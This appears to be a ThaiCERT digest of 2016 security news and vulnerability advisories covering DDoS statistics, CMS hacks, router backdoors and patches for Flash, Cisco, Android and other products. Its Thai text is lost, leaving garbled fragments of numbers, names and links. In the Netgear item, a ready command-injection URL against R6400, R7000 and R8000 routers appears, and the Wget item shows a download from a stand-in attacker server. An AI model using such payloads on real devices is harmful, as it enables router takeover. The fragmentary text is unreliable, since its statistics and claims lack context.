: 23/09/2559
: Blancco <http://thcert.co/gk4FUQ>

40%
Word

CyberArk CyberArk

750


- 40%

Word Excel 28%


- 95%

45%

- 68%


57%
cloud

: 26/09/2559
: eSecurity Planet <http://thcert.co/jRXuRB>,
CyberArk <http://thcert.co/qvOpDH>

Sucuri 2559
WordPress Joomla!
Sucuri 3
RevSlider, TimThumb
2559 GravityForms
WordPress
Joomla! Sucuri
52% Google
Safe Browsing
blacklist
21,821
WordPress 48%
15,769 backdoor
Norton Safeweb 38%
Joomla! 3,099 McAfee SiteAdvisor
11%

CMS
75% CMS

backdoor

Sucuri
WordPress
22%

: 27/09/2559
: Security Affairs <http://thcert.co/UtJpdH>,
Sucuri <http://thcert.co/5SokNN>

DDoS
1
Neustar - 53%
information
security 1,000 DDoS ( DDoS
)
DDoS
DDoS
- 73%
DDoS
DDoS
- DDoS 1.1 Tbps
85% 1 2559
- 49%
DDoS
1 (
350,000 )
- 76%
DDoS 47%
Cloud 37%
DDoS

: 06/10/2559
: Neustar <http://thcert.co/pKg62L>,
Help Net Security <http://thcert.co/LhL7I7>


1 10


97%
86%
77%
Trend Micro (disaster recovery
plan) 33%



11%

20%
82%





33%
24%
14%

: 07/10/2559
: Betanews <http://thcert.co/4Xs5BA>

Android
1 Play Store

Cheetah Mobile Android



Android 1 3



SMS

1

Clean
Master

: 19/10/2559
: Security Week <http://thcert.co/1zcENd>,
Cheetah Mobile <http://thcert.co/egcgnt>

89%
Wi-Fi

Xirrus Wi-Fi Wi-Fi



2,000
Wi-Fi

- 31% Wi-Fi
Wi-Fi
- 89% Wi-Fi




Wi-Fi
- 43% Wi-Fi VPN
42%

- 47% VPN
Wi-Fi
: 25/10/2559
: Help Net Security <http://thcert.co/r92CP1>

NTT Security 3
2559
NTT Security -
17%
3 2559 (SERT Quarterly Threat
Report Q3 2016)
Security Engineering Research -
Team (SERT)


-

23% (19%)
(18%)
(12%)
(11%) - Netis
(Netcore)
- 43% 2558
Fortinet
SQL injection

-
48


-

73%
: 27/10/2559
: Help Net Security <http://thcert.co/askwO2>

15%
20% Telnet

ESET Telnet
12,000



15%
admin




40%


20%

: 28/10/2559
: We Live Security <http://thcert.co/m9Nqwv>

SecurityScorecard -
7 63%

2559 (2016 Healthcare
Industry Cybersecurity Report)

700

21st
- Century Oncology
2.2
9 18 Hollywood
5 Presbyterian Medical Center
17,000
6
- 75%
1

90%

: 04/11/2559
: SecurityScorecard <http://thcert.co/Fb0df5>,
PR Newswire <http://thcert.co/gNyJLW>

77%
95%
Barkly
60
1
77%
95%
52%

1 3




Barkly
81%

50%

: 15/11/2559
: eSecurity Planet <http://thcert.co/uumJPn>,
Barkly <http://thcert.co/2eo727>

Akamai
3 2559 IoT
Akamai CDN 2
cloud computing NTP reflection

3 2559 DDoS
Internet of Things (IoT)

2559 DDoS
IoT Mirai
3 2558

- DDoS
71%
- layer 3 4
77%
-
100 Gbps 138%
- SQL injection
21%
- DDoS UDP
fragment DNS reflection
: 17/11/2559
: Help Net Security <http://thcert.co/JimGCJ>,
Akamai <http://thcert.co/zqIdHz>

66%

Ponemon - 2
2016 Cyber Resilient Organization 74%
64%

2,400 - 70%
2558

-

4

( 142 )
-
4 ( 14
(66%) )
3 4



-
3


- 32%

: 24/11/2559
: Resilient Systems <http://thcert.co/y27G6Z>,
Tripwire <http://thcert.co/4ZjHaG>

Flash Player,
Internet Explorer Windows
Recorded Future



(exploit kit) Adobe Flash
Player Microsoft
(Internet Explorer, Silverlight
Windows)


Flash Player Internet
2558 2559 Explorer
10
Flash Player
6
Internet Explorer
(CVE-2016-0189)

2559

: 07/12/2559
: Security Affairs <http://thcert.co/UDMn8c>

UK 90%
Windows XP
2


(NHS)
90% Windows
XP
15 Microsoft


2557 (
https://www.thaicert.or.th/papers/general/2014/pa2014ge001.html)

14%
2559 29%
2560



: 09/12/2559
: The Register <http://thcert.co/a6ZHAI>

1 5

(

)





Keepsafe
1,000


20%

- 66%

- 50%

: 15/12/2559
: Help Net Security <http://thcert.co/ACIraw>

Vulnerability & Patch



Google 2559
Android Nexus
4 2559 (Critical) 5
Google (High) 2
Android (Moderate) 5

Mediaserver
Android

Google
Over-The-Air OTA
Nexus

Android Open Source Project
AOSP
Google Nexus


7 2558


Android
Android



12
: 07/01/2559
: Android <http://thcert.co/gUxcV0>

VMware privilege
escalation Shared Folder
VMware
privilege escalation Shared Folder VMware
ESXi, Fusion, Player
Workstation
Shared Folder
guest (
CVE-2015-6933)
VMWare
guest
host
: 08/01/2559
: The Register <http://thcert.co/aaLqpu>

OpenSSH
Private Key
14 2558 OpenSSH
OpenSSH
Client Private
Key
Roaming
Session

1. UseRoaming no global ssh_config(5)
2. UseRoaming no ~/.ssh/config user configuration
3. option -oUseRoaming=no command line



5.4-7.1 OpenSSH 7.1
7.1p2

3
: 22/01/2559
: The Register <http://thcert.co/wrFzmJ>

Debian
8 2559
Debian
19 Debian
,
(Denial of Service)

(Privilege escalation)
Debian
(3.2.73-2+deb7u3
Wheezy 3.16.7-ckt20-1+deb8u4
Jessie)

: 08/03/2559
: Debian <http://thcert.co/a6EjqE>

Microsoft,
Adobe, Google, Mozilla Apple .. 59
2559 Microsoft, Remote Code
Adobe, Google, Mozilla Apple Execution

(Remote Code Execution)


Microsoft
39 Windows
Internet Explorer,
Microsoft Edge
Remote Code Execution
5
Adobe Reader 11.0.15, Acrobat 15.010.20060
Adobe Flash Player (21.0.0.182
Windows, OS X 11.2.202.577
Linux ), Firefox 45, Chrome
49.0.2623.87 Apple Software
Update 2.2

: 14/03/2559
: Microsoft <http://thcert.co/Ya8S76>,
Mozilla <http://thcert.co/ndLb72>,
Apple <http://thcert.co/pAqpDw>

Truecaller
Android 100
Cheetah Mobile
Security Research Lab
Truecaller 22

Android Truecaller

Android
100
Truecaller
IMEI

IMEI
Truecaller




: 29/03/2559
: Cheetah Mobile <http://thcert.co/rZghTm>

iOS 9 - 9.3.1
Passcode
videosdebarraquito
YouTube Siri 3D Touch
iOS 9 - 9.3.1 (https://youtu.be/Jk7GaO_vAW8) iPhone 6S iPhone
iPhone 6S 6S Plus
Passcode Apple
Siri
Twitter Siri
Twitter
3D Touch

: 05/04/2559
: The Next Web <http://thcert.co/cpcSnN>

Cisco

6 2559 Cisco
8 (Remote Code Execution)
Prime Infrastructure,
Evolved Programmable Network (Denial of Service)
Manager, TelePresence Server, UCS
Invicta
: 07/04/2559
: Cisco <http://thcert.co/O24Wce>

Adobe Flash Player 21.0.0.213

8 2559 Adobe
Adobe Adobe Flash CVE-2016-1019
Player 24
(Adobe Flash
Player 21.0.0.213 Windows
OS X, Adobe Flash Player 11.2.202.616
Linux)
(Remote Code Execution)
: 08/04/2559
: Adobe <http://thcert.co/pusNYl>

Samsung Galaxy
. SMS
.
Roberto Paleari Aristide Fattori SMS
Samsung
Galaxy
USB Samsung Galaxy S6,
Galaxy Note 3, Galaxy S4
. SMS
ADB

Samsung

Samsung modem

USB

Linux
modem

device ( /dev/ttyACM0)
device

: 18/04/2559
: Help Net Security <http://thcert.co/I6Zlew>

QuickTime Windows
Apple
Trend Micro QuickTime
QuickTime Windows
Windows

QuickTime
Apple QuickTime
QuickTime Windows

QuickTime
Windows

QuickTime

VLC (
)
QuickTime

Adobe
QuickTime

Adobe
: 20/04/2559
: Trend Micro <http://thcert.co/joqPb8>,
ZDNet <http://thcert.co/6vii0R>

Cisco

20 2559 Cisco
Cisco Wireless LAN Controller
Cisco Wireless LAN (Critical)
Controller, Cisco Adaptive Security Cisco
Appliance Software
5
(Denial of Service)
: 21/04/2559
: Cisco <http://thcert.co/O24Wce>

HP Data Protector

18 2558
Hewlett Packard (HP) (
6 HP Data Protector 7.03_108, 8.15 9.06)

4
CVSS 10



(Remote Code Execution),
(Private Key)
SSL

Man-in-the-middle

: 26/04/2559
: HP <http://thcert.co/5p7Iyw>

Firefox 46
26 2559
Mozilla (Firefox 46)
Firefox 10
1


(Remote Code
Execution)
: 27/04/2559
: Mozilla <http://thcert.co/CXgEsL>

Chrome

28 2559 Google
9 Chrome
(50.0.2661.94)

(Remote Code
Execution)
: 29/04/2559
: Chrome Releases <http://thcert.co/Zx8L6J>

ImageMagick

ImageMagick


ImageMagick shell command
Linux
distro Ubuntu
ImageMagick 6.9.3-9


4 2559
ImageMagick 1.

file signature
magic bytes

2. Policy

ImageMagick coders
CVE-2016-3714



ImageMagick

: 04/05/2559
: Openwall <http://thcert.co/mTeIJ3>

Apple Xcode 7.3.1


Git
OS X 3 2559
(OS X 10.11 El Capitan) Apple Apple Xcode
Git 7.3.1 Git
Git 2.7.4 2
(2.6.4) OS X 10.11 El Capitan
2 CVE-2016-2324 Git
CVE-2016-2315 Xcode
remote code execution

: 04/05/2016
: Apple <http://thcert.co/4S9V6m>,
rachelbythebay <http://thcert.co/F7yQZs>

OpenSSL

OpenSSL
SSL
TLS Open Source CA (Certificate Authorities)



OpenSSL Padding Oracle
Cookie
VPN OpenVPN
SSH AES CBC
OpenSSH (Advanced Encryption Standard Cipher
Algorithm in Cipher Block Chaining)
3 2559
OpenSSL AES-NI (Advanced
OpenSSL 6 Encryption Standard Instruction Set)
2

(Encoder) ASN.1 OpenSSL
(Abstract Syntax Notation One) (1.0.2c, 1.0.1o)
OpenSSL
ASN.1

: 04/05/2559
: OpenSSL <http://thcert.co/n3pIcb>


Cisco
Cisco TelePresence
4 2559 Cisco


Cisco TelePresence XML
API
HTTP Request
XML API

Cisco
Cisco FirePOWER
System Software Cisco Adaptive
Security Appliance
(Denial of Service)

: 06/05/2559
: Cisco <http://thcert.co/zQ6GJM>

HTTPS





SSL
root CA
SSL Private
root CA key


Kaspersky

2558
30 SSL

Kaspersky
TLS/SSL



Man-in-the-Middle

: 10/05/2559
: The Register <http://thcert.co/WJlxRo>

WordPress 4.5.2

6 2559 WordPress
WordPress 4.5.2
2
SOME (Same Origin Method Execution)



Cross-Site
Scripting

: 10/05/2559
: Softpedia <http://thcert.co/Okp6mh>,
WordPress <http://thcert.co/db5t5Y>

Microsoft Adobe

10 2559
Microsoft Adobe




(Remote
Code Execution)
Microsoft 16
Windows
Internet Explorer, Microsoft
Edge, Microsoft Office, Microsoft .NET
Framework
Remote Code Execution 7
Adobe
ColdFusion, Acrobat
Adobe Reader
Remote
Code Execution

: 11/05/2559
: Adobe <http://thcert.co/d8iKmm>,
Microsoft <http://thcert.co/Y8CELR>

Adobe Flash Player 21.0.0.242

10
2559 Adobe


Flash Player Cerber Locky

(
CVE-2016-4117)
12 Adobe
Flash Player
21.0.0.242 ( Linux
11.2.202.621)

Adobe (https://get.adobe.com/flashplayer/)

: 13/05/2559
: Softpedia <http://thcert.co/khQfSt>

WordPress Jetpack
XSS

27 2559
Sucuri
Jetpack WordPress
WordPress
1
Cross-site
Scripting (XSS)
Sucuri 78%
WordPress 56%


Jetpack
4.0.3

: 31/05/2559
: Sucuri <http://thcert.co/kv9sqE>,
Sucuri <http://thcert.co/XdSfJq>

Duo Labs - Dell: Dell Foundation


(Bloatware) Services
HTTPS


- HP: HP Support
Solutions Framework
HTTP

, HP Download
and Install Assistant 8092

()

- Lenovo: UpdateAgent HTTP

Lenovo
Solutions Center

- Acer: Acer Care Center


HTTP


Windows
- Asus: Asus Live Update
HTTP


: 31/05/2559
: Threatpost <http://thcert.co/qxhc2l>,
Duo Labs <http://thcert.co/Mr0xo6>

Samsung KNOX Samsung


Galaxy

Tel Aviv 1. KNOX 1.0


Samsung
KNOX (CVE-2016-1919)
Android
Samsung 2. KNOX 1.0
Android VPN
Samsung KNOX (CVE-2016-1920)

3. KNOX 1.0 2.3
Samsung KNOX KNOX clipboard
Samsung (CVE-2016-3996)
2557 Samsung
Samsung
Samsung KNOX Galaxy
Samsung Galaxy KNOX
3 KNOX

Settings About Devices
KNOX version
: 01/06/2559
: Softpedia <http://thcert.co/PionQx>,
Arxiv <http://thcert.co/2Acjl7>

KeePass 2 HTTP


KeePass
2

Auto Update KeePass
Auto Update KeePass
2 HTTP KeePass 2


HTTPS Sourceforge (https://sourceforge.net/projects/keepass/)
KeePass HTTP (http://keepass.info/)
KeePass
1.
YouTube (https://www.youtube.com/watch?v=gOxcQSbpA-Q)
CVE-2016-5119 HTTP
KeePass (2.33)
2. KeePass
Auto Update
KeePass 2
Sourceforge
(http://keepass.info/integrity.html)


: 02/06/2559
: bogner.sh <http://thcert.co/r0Vhsl>

Lenovo Lenovo
Accelerator Application

Duo Labs
(Bloatware) Lenovo Windows 10
( ThinkPad
ThinkStation)
Lenovo Accelerator Application
Lenovo

Lenovo

Lenovo Accelerator
Application

Lenovo Accelerator
Application
Lenovo







: 03/06/2559
: Lenovo <http://thcert.co/u8N5Dq>

Mitsubishi Outlander

Mitsubishi Outlander


2556
Wi-Fi


Wi-Fi



Wi-Fi
Wi-Fi

Wi-Fi

: 08/06/2559
: Help Net Security <http://thcert.co/uMSJR7>,
Forbes <http://thcert.co/83UFDv>

KeePass
HTTPS

KeePass KeePass

KeePass
Properties
HTTP



KeePass

KeePass





(2.34) HTTPS

: 10/06/2559
: KeePass <http://thcert.co/xjsfZ2>

D-Link

Senrio

D-Link (Internet of Things)
DCS 930L Wi-Fi


Wi-Fi


: 10/06/2559
: Threatpost <http://thcert.co/PfguVz>,
Senrio <http://thcert.co/qRALc3>

! Samsung Software Updater



Software Updater (SW Update)

Samsung
Windows Samsung
SW Update 2.2.7.24
Blue Frost Samsung
Security
Samsung (http://www.samsung.com/th/support/swupdate/support-swupdate-popup.html)


SW Update (Bloatware)







SW Update
: 14/06/2559
: The Register <http://thcert.co/xCOhX9>,
Full Disclosure <http://thcert.co/uxec2v>

Adobe Flash Player !


(CVE-2016-4171)
14 2559
Adobe CVE-2016-4171
Adobe Flash Player Adobe Flash Player
21.0.0.242 Internet Explorer

Windows, Adobe
Macintosh, Linux Chrome OS 16
2559
Adobe Flash Player

Adobe Flash Player
Kaspersky (https://www.thaicert.or.th/papers/general/2015/pa2015ge003.html)
ScarCruft
: 15/06/2559
: Ars Technica <http://thcert.co/tGlG5W>,
Adobe <http://thcert.co/rlPxWD>

Symantec
Norton
Google Project Zero
Symantec
Symantec Norton
Symantec





Google



Advanced Threat
Protection (ATP), Symantec Endpoint
Protection (SEP), Norton AntiVirus,
Norton Internet Security, Norton 360


Symantec (https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_00)
: 29/06/2559
: Ars Technica <http://thcert.co/NWyEnC>,
Google Project Zero <http://thcert.co/vn0KYh>

Foxit Reader 8.0

27 2559 Foxit Reader


Foxit Reader
PDF 8.0 https://www.foxitsoftware.com
12

Remote Code Execution

Foxit
Reader 400
: 01/07/2559
: The Register <http://thcert.co/pFeNpu>

LibreOffice
RTF
Cisco Talos CVE-2016-4324
LibreOffice LibreOffice 5.1.4
5.2.0 LibreOffice


RTF

.rtf

: 01/07/2559
: Security Week <http://thcert.co/vDVo5E>,
Cisco Talos <http://thcert.co/iGQrdv>

Wget 1.18
redirect
GNU Wget


Unix/Linux
SecuriTeam
Wget 1.17 Wget
redirect
.wgetrc
( CVE-2016-4971) Proxy

Wget
Wget
URL (
Cron Job)
wget http://attackers-server/safe_file.txt
Wget
-O
safe_file.txt http://attackers-server
HTTP
30X redirect URL GNU Wget
Wget 1.18
URL

Wget GNU (https://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html)
redirect
(Configuration file)
.bash_profile .wgetrc
: 05/07/2559
: SecuriTeam <http://thcert.co/0qfdpj>

ThinkPwn BIOS
Lenovo, HP Gigabyte


ThinkPad
Lenovo System
Management Mode (SMM) BIOS Lenovo, HP
Gigabyte







HP
Pavilion

Gigabyte Z68-UD3H, Z77X-
UD5H, Z87MX-D3H, Z97-D3H

BIOS

: 06/07/2559
: NDTV <http://thcert.co/FGMy4Q>,
The Register <http://thcert.co/imtjEU>

Microsoft
(CVE-2016-3238)

12 2559 Microsoft https://msdn.microsoft.com/en-us/library/cc251294.aspx)


Microsoft


Vectra
CVE-2016-3238 Windows










Microsoft
Web Point-and-Print Protocol
(MS-WPRN)

Microsoft
3170455

(

: 13/07/2559
: Threatpost <http://thcert.co/oZGPK4>,
Vectra <http://thcert.co/BLvTQ0>

iOS Mac OS X
MMS, ,

Cisco Talos Apple


iOS, Mac
OS X, watchOS tvOS (iOS 9.3.3,
ImageIO Mac OS X 10.11.6, tvOS 9.2.2
watchOS 2.2.2)



MMS,
iMessage





: 21/07/2559
: We Live Security <http://thcert.co/MtLrdl>,
Cisco Talos <http://thcert.co/RbawgP>

Internet Explorer Edge


Microsoft Account

Internet
Internet Explorer Edge
Explorer Edge
Windows SMB
Microsoft Account file://

SMB network share
Windows IP
src
SMB file://

Windows
Windows 10 (
( 2559)
) Hash
Windows 8 Internet Explorer Edge
Microsoft Account Windows Microsoft
Hash Account
Hash

Microsoft Account
NTLM Firewall
SMB IP


: 04/08/2559
: Medium/@ValdikSS <http://thcert.co/zsoyLG>,
Perfect Privacy <http://thcert.co/YKlLk9>

Quadrooter Qualcomm
Snapdragon Android root

Google
Check Point
Qualcomm Android Android
/
2559
3 1
Android Qualcomm (
Snapdragon) root 2559





Android

(Permission)





4 Qualcomm
: 08/08/2559
: ZDNet <http://thcert.co/Mm4zHC>,
DEF CON 24 <http://thcert.co/Cb2GAW>

! Cisco
Equation Group

Equation Group


(Remote Code Execution)
NSA Cisco

Cisco
15 2559 8.4(3)
Shadow Brokers

Equation Group
ExtraBacon
CVE-2016-6366
Cisco
SNMP
SNMP


17 2559 Cisco
Cisco

EpicBanana SNMP
CVE-2016-6367 Community String
Cisco

DoS (Denial of Service)
: 17/08/2559
: Cisco <http://thcert.co/wJ5itf>

Apple OS X

Apple OS X OS X
Yosemite 10.10.5 OS X El Capitan
10.11.6 CVE-2016-4655,
CVE-2016-4656, CVE-2016-4657
Webkit Kernel




3
iOS Pegasus
Apple iOS 9.3.5
3
2559
: 02/09/2559
: VultureBeat <http://thcert.co/RrVLqz>

Cisco WebEx
Meetings Server

Cisco 2
2559
2 Cisco
WebEx Meetings Server 2.6

CVE-2016-1482

(Remote Code
Execution) CVE-2016-1483

(Denial
of Service)
: 16/09/2559
: The Register <http://thcert.co/N9G7mV>,
US-CERT <http://thcert.co/qrlmLE>


Drupal

SANS Internet Storm Center



Drupal 7.x
RESTful Web Services Drupal




2559 (https://www.drupal.org/node/2765567)

Drupal

: 16/09/2559
: Softpedia <http://thcert.co/N7a1uF>,
SANS Internet Storm Center <http://thcert.co/eLoXa6>

Cisco 850,000
0-day BENIGNCERTAIN

2559 Shadow Server


Shadow Brokers
Equation 25
Group 2559 Cisco
850,803
250,000

BENIGNCERTAIN
Cisco

BENIGNCERTAIN
CVE-2016-6415 Cisco
intrusion detection system
Internet Key Exchange
version 1 (IKEv1)
Cisco Cisco IOS,
Cisco IOS XE Cisco IOS XR

: 26/09/2559
: Softpedia <http://thcert.co/q0qU4i>,
Shadow Server <http://thcert.co/tnWJsu>,
Cisco <http://thcert.co/EoA6gw>

Samsung Knox


Viral Security Group Samsung
Samsung Knox
2559
Android Samsung

Galaxy S6
Galaxy Note 5

KNOXout
CVE-2016-6584
CVE-2015-1805
(iovyroot)
Real-time Kernel Protection (RKP)
Knox root
: 04/10/2559
: Wired <http://thcert.co/zzpG2b>,
Viral Security Group <http://thcert.co/KFAMue>

Rapid 7

Animas OneTouch
Ping
900
3 MHz

90
1-2



-



-

: 05/10/2559
: Softpedia <http://thcert.co/NRihM9>,
Rapid 7 <http://thcert.co/JmF859>

Avtech
130,000
Search-Lab
http://www.search-lab.hu/media/vulnerability_matrix.txt
Avtech (http://www.avtech.com.tw/)


- Shodan
CSRF

Avtech 130,000

- (https://www.shodan.io/search?query=avtech)
plaintext


- DVR


- Bypass captcha
login=quick Avtech




Avtech

: 12/10/2559
: The Register <http://thcert.co/RcFAlP>,
SecLists <http://thcert.co/I2zsaM>

Pork Explosion Android


Jon Sawyer
( Justin Case backdoor
jcase) Foxconn
Android
Pork Explosion bootloader
bootloader Foxconn reboot-ftm
Factory Test
Mode
Factory Test Mode InFocus M810 Nextbit
Robin
SELinux
adb
2


Foxconn

brute force


: 13/10/2559
: Android Police <http://thcert.co/qlZMlv>,
BBQ and 0days <http://thcert.co/ldcjwV>

Akamai SSHowDowN OpenSSH


IoT DDoS

Akamai CDN SSH IoT (


SSHowDowN
DDoS brute force )
IoT
proxy
IoT CVE-2004-1653
OpenSSH
2548 Akamai
IoT
SSH (
SSH
AllowTcpForwarding No)
CVE-2004-1653 SSH
IP
AllowTcpForwarding
OpenSSH
port bounce (
http://www.semicomplete.com/articles/ssh-security/)
Telnet
: 13/10/2559
: Akamai <http://thcert.co/TbzDy5>,
Softpedia <http://thcert.co/oYnDUS>

Nine Android

Nine Android Fi access point


9Folders Inc. )
Microsoft man-in-the-middle
Exchange Microsoft Exchange
( base64)


1
2559 Nine
Rapid7 3.1.0
Nine
Microsoft
Nine Exchange



( Wi-Fi Wi-
: 17/10/2559
: Threatpost <http://thcert.co/YS6xso>,
Rapid7 <http://thcert.co/iHAQb6>
Nine <http://thcert.co/YHp75z>

Netis,
D-Link, Asus 3

Fortinet s3cur1ty.de/m1adv2013-017)
2

1 30 2559 Asus

3 Netis (Netcore), infosvr UDP 9999
D-Link Asus

Netis 2557 (
(Netcore) backdoor https://github.com/jduck/asus-cmd)
UDP 53413
9

Fortinet

2557 ( http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/)
1.75

D-Link
command.php

2556 ( http://www.
: 20/10/2559
: Fortinet <http://thcert.co/MCoTXF>

Dirty COW Linux


(CVE-2016-5195) root

Linux kernel
kernel 2.6.22 (
Linux 2550)
root
Dirty
COW CVE-2016-5195 21 2559
Linux Red Hat, Debian
Ubuntu

race condition copy-on-write
(COW)
http://dirtycow.ninja/

root
setuid
root
: 21/10/2559
: The Register <http://thcert.co/87TWRo>,
Graham Cluley <http://thcert.co/fwjqUK>

Joomla! 3.6.4

25 2559
Joomla! Joomla! 3.4.4 3.6.3
Joomla! 3.6.4
2

Joomla!
3.6.4
CVE-2016-8869


CVE-2016-8870

: 26/10/2559
: Joomla! <http://thcert.co/mLzetj>,
Softpedia <http://thcert.co/WTlsCQ>

Adobe
Flash Player
26 2559 Adobe
Adobe
CVE-2016-7855
Adobe Flash Player Adobe
Flash Player
(23.0.0.205
Windows macOS, 11.2.202.643
(Remote Code Execution) Linux)

- Adobe Flash Player
23.0.0.185 Adobe Flash
Windows macOS Player
(https://www.thaicert.or.th/papers/general/2015/pa2015ge003.html)
- Adobe Flash Player
11.2.202.637
Linux
: 27/10/2559
: Adobe <http://thcert.co/EugmN8>,
Dark Reading <http://thcert.co/pkGgLs>

Joomla!
3.6.4 25,000
Joomla! db_cfg
3.6.4 fsugmze3
25 2559
ringcoslio1981@gmail.com



/index.php/component/users/?task=user.register
Joomla!
25,000

Sucuri
Joomla!
Joomla!

: 31/10/2559
: Softpedia <http://thcert.co/HpFnw5>,
Sucuri <http://thcert.co/p0l5Ru>

MySQL, MariaDB
PerconaDB
(CVE-2016-6663, CVE-2016-6664)
- Percona Server
Legal Hackers 5.5.51-38.2, 5.6.32-78-1, 5.7.14-8
MySQL, MariaDB PerconaDB
(CVE-2016-6663 - Percona XtraDB Cluster
CVE-2016-6664) 5.6.32-25.17, 5.7.14-26.17,
race condition root privilege 5.5.41-37.0
escalation MySQL PerconaDB
2
MariaDB
( mysql) CVE-2016-6663
CVE-2016-6664

( root)


- MySQL 5.5.51, 5.6.32,
5.7.14

- MariaDB 5.5.52,
10.1.18, 10.0.28

: 03/11/2559
: Threatpost <http://thcert.co/bdRdyS>,
Legal Hackers <http://thcert.co/sHA1i3>,
Legal Hackers <http://thcert.co/gGfbuC>

D-Link DIR
remote administration

CERT
D-Link

buffer overflow
SOAP
Home Network Automation
Protocol (HNAP)
root
CVE-2016-6563

DIR-823, DIR-822, DIR-818L(W), DIR-895L, DIR-890L, DIR-885L,
DIR-880L DIR-868L

remote administration (
D-Link http://www.dlink.com/uk/en/support/faq/cameras-and-surveillance/mydlink/settings/router/how-do-i-enable-remote-management-on-my-dir-series-router)

: 08/11/2559
: CERT <http://thcert.co/YIT85u>,
The Register <http://thcert.co/obzaU6>

MacBook Pro 2016 Touchbar SIP


()
Apple
OS X El Capitan (10.11) Apple
Apple System
Integrity Protection (SIP)
MacBook Pro
root SIP
(
SIP https://support.apple.com/th-th/HT204899)
1.
2. CMD + R
MacBook Recovery Mode
Pro 2016 Touchbar ( 13
15 ) macOS 3. Utilities
SIP
Function SIP 4. Terminal

5. csrutil enable
macOS ( )
SIP
6.
Terminal csrutil status
SIP
System Integrity
Protection status: disabled
SIP
: 18/11/2559
: MacRumors <http://thcert.co/UEzj4i>,
iMore <http://thcert.co/RWzcgY>

Netis 15,000
2

2557 Trend Micro botnet


backdoor
Netis
UDP 53413
(
: IoT)
Netis



Trend Micro
2559 2



- 2559
57
Shadow
Server

Netis 15,000
: 25/11/2559
: Bleeping Computer <http://thcert.co/kyQT3f>,
Trend Micro <http://thcert.co/qx5eYS>,
Shadow Server <http://thcert.co/9vl21S>

0-day Firefox
Tor Browser

Firefox
0-day Mozilla
Firefox JavaScript Firefox Tor
Windows Browser JavaScript ()


FBI : Mozilla
Tor
2556 Firefox 50.0.2 Tor Browser 6.0.7



Firefox 41
50 Windows
Tor Browser

Tor
Firefox 45 ESR

: 30/11/2559
: Ars Technica <http://thcert.co/fr6vi4>,
Tor Project <http://thcert.co/Ydf2qi>

(pacemaker)





(
http://www.ns.mahidol.ac.th/english/th/departments/MN/th/med-km55-1.html)
5



10


: 02/12/2559
: The Register <http://thcert.co/RcwPvj>,
<http://thcert.co/CFSfX6>

Sony
80

6 2559 Sony
SEC Consult

(IP Camera)
Sony 80 https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20161206-0_Sony_IPELA_Engine_IP_Cameras_Backdoors_v10.txt
admin root




: 08/12/2559
: Threatpost <http://thcert.co/7ploSh>,
The Register <http://thcert.co/UjyWUP>

Netgear

Netgear
Netgear R6400, R7000 R8000
command Netgear
injection




http://<router_IP>/cgi-bin/;killall$IFShttpd
http://<router_IP>/cgi-bin/;COMMAND

root
: 13/12/2559
: US-CERT <http://thcert.co/vGwI7s>,
Bas <http://thcert.co/f8hqhI>,

! Joomla!
3.6.4 admin

Joomla! Joomla!
3.6.5



CVE-2016-9838
Joomla!
1.6.0 3.6.4



PHP .php6, .php7, .phtml
.phpt web
shell CVE-2016-9836

: 19/12/2559
: Bleeping Computer <http://thcert.co/0hyxfA>,
Joomla! <http://thcert.co/6ncgGE>

Netgear R6250,
R6400, R7000 R8000

US-CERT
R6250, R6400, R7000 R8000
Netgear (R6700,
19 2559 R6900, R7100LG, R7300DST, R7900,
Netgear D6220, D6400)
(beta)
Netgear


: 20/12/2559
: Graham Cluley <http://thcert.co/SjHh1w>,
Netgear <http://thcert.co/C3gPxC>

Netgear ZyXEL

ZyXEL P660HN-T
Billion 5200W-T 4
Netgear ZyXEL Remote Code
Execution

4
ISP


Netgear WNR2000
3
Remote Code Execution




(Remote Administration)

Shodan
10,000

3

: 27/12/2559
: Bleeping Computer <http://thcert.co/4ZiFs1>,
SecList <http://thcert.co/RLIz6t>


(,
Awareness ) MasterCard

(
,
Fraud )


(
Incident
, )
SWIFT
12


Law & Policy


(
, ,
Malware )
CTB-Locker


(,
Privacy )
QQ Browser


Research &
Education

FBI
Statistics 2.3 2


Vulnerability
D-Link